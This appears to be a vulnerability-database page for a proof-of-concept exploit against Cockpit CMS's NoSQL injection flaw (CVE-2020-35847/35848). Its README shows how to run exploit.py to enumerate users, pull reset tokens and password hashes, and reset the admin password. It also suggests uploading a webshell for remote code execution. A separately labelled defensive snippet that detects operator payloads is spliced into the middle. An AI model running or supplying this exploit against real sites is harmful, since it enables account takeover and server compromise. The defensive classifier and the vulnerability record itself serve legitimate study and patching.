
CVE-2020-35847 PoC — Agentejo Cockpit SQL Injection Vulnerability

Source
Associated Vulnerability
Title: Agentejo Cockpit SQL Injection Vulnerability (CVE-2020-35847)
Description: Agentejo Cockpit is a content management system from the German company Agentejo for managing structured website content. Versions of Agentejo Cockpit before 0.11.2 contain an SQL injection vulnerability that allows NoSQL injection through the resetpassword function of the Auth.php controller.
Description
CVE-2020-35847, CVE-2020-35848 : Account Takeover
Readme
# Cockpit CMS NoSQL Injection (CVE-2020-35847, CVE-2020-35848)

Cockpit CMS before version 0.11.2 is vulnerable to NoSQL injection in the **/auth/resetpassword** and **/auth/newpassword** endpoints, which allows extraction of password reset tokens; those tokens enable user-detail enumeration as well as password reset.

> Read More - https://swarm.ptsecurity.com/rce-cockpit-cms/
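The root cause described above is a lookup parameter reaching the storage layer as a query fragment instead of a plain string. The following added example (not part of this PoC or of Cockpit's code) shows the defender's side: a strict type check of the kind the fix relies on, plus a classifier that labels request bodies so the rejected ones can be reviewed in logs. The JSON bodies, the `user` field name and the reject labels are constructed assumptions for illustration.

```python
import json
from typing import Any, Optional

# Constructed sample request bodies for a password-reset endpoint.
# None of these were captured from a real system.
SAMPLE_BODIES = {
    "plain_string": '{"user": "admin"}',
    "operator_object": '{"user": {"$ne": ""}}',
    "nested_operator": '{"user": {"x": {"$in": ["admin"]}}}',
    "array_value": '{"user": ["admin"]}',
    "missing_param": '{}',
}


def contains_operator(value: Any) -> bool:
    """True if any dict key at any depth starts with '$', the operator
    prefix that Mongo-style query engines interpret when a decoded
    object is passed through as a filter."""
    if isinstance(value, dict):
        return any(k.startswith("$") or contains_operator(v)
                   for k, v in value.items())
    if isinstance(value, list):
        return any(contains_operator(v) for v in value)
    return False


def strict_user_param(body: dict) -> Optional[str]:
    """Mitigation pattern: the lookup key must be a non-empty scalar
    string. Objects, arrays, numbers or a missing field are refused
    instead of being handed to the storage layer."""
    user = body.get("user")
    if isinstance(user, str) and user.strip():
        return user
    return None


def classify_request(raw_body: str) -> str:
    """Detection view: label a JSON request body with the reason it
    would be refused, so a log review or WAF rule can act on it."""
    try:
        body = json.loads(raw_body)
    except ValueError:
        return "reject:not-json"
    if not isinstance(body, dict) or "user" not in body:
        return "reject:missing-user"
    if contains_operator(body["user"]):
        return "reject:operator-injection"
    if strict_user_param(body) is None:
        return "reject:non-string-user"
    return "accept"
```

Run `classify_request` over each entry of `SAMPLE_BODIES`: only the plain-string body is accepted, and every operator-carrying body is labelled `reject:operator-injection` regardless of nesting depth.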

This Python script enumerates users on the system and resets a chosen user's password.

# Usage

```bash
python3 exploit.py -u http://cockpit-site-url
```

The script first enumerates users on the system.

```bash
[+] http://cockpit-site-url: is reachable
[-] Attempting Username Enumeration (CVE-2020-35846) : 

[+] Users Found : ['admin', 'user1', 'user2', 'user3']
```
Then you can choose which user to gather more information on. This also generates reset tokens for that user, a key requirement in the password reset.

```bash
[-] Get user details For : admin
[+] Finding Password reset tokens
         Tokens Found : ['rp-4e82b990aff752bfb1dc9845d5338f6e610d0608bb75e']
[+] Obtaining user information 
-----------------Details--------------------
         [*] user : admin
         [*] name : Admin
         [*] email : admin@yourdomain.de
         [*] active : True
         [*] group : admin
         [*] password : $2y$10$6uQ2PXh4vShH.D4gw..WtO0NHQq7J36ugmwKNtJGzu9p9OqSEpVUW
         [*] i18n : en
         [*] _created : 1621655201
         [*] _modified : 1621655201
         [*] _id : 60a87ea165343539ee000300
         [*] _reset_token : rp-4e82b990aff752bfb1dc9845d5338f6e610d0608bb75e
         [*] md5email : a11eea8bf873a483db461bb169beccec
--------------------------------------------
```
Finally you can choose to reset the user's password.

```bash
[+] Do you want to reset the passowrd for admin? (Y/n): y
[-] Attempting to reset admin's password:
[+] Password Updated Succesfully!
[+] The New credentials for admin is: 
         Username : admin 
         Password : new_random_password
```

You can then choose to upload a webshell to the /finder component to gain RCE.
File Snapshot

```
[4.0K] /data/pocs/cc668aca4edac490cf4f4ac07033242869cfda16
├── [4.8K] exploit.py
└── [2.0K] README.md

0 directories, 2 files
```